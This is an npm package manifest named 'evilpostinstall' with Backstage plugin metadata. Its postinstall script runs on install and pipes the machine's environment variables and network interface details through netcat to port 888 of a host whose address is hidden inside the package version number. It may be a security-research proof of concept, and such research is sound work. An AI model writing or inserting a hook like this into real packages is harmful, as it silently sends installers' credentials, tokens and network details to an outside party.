{
  "name": "evilpostinstall",
  "version": "0.4.0",
  "description": "Assess the system running postinstall",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "postinstall": "(env; ip addr) | nc \"$(echo \"$npm_package_version\" | cut -d. -f1-2).$(echo \"$npm_package_version\" | cut -d. -f3- | cut -b 2-4).$(echo \"$npm_package_version\" | cut -d. -f3- | cut -b 5-7)\" 888"
  },
  "author": "",
  "license": "BSD-2-Clause",
  "backstage": {
    "role": "frontend-plugin",
    "pluginId": "example"
  },
  "exports": {
    ".": {
      "backstage": "./src/plugin.ts"
    },
    "./package.json": "./package.json"
  }

}
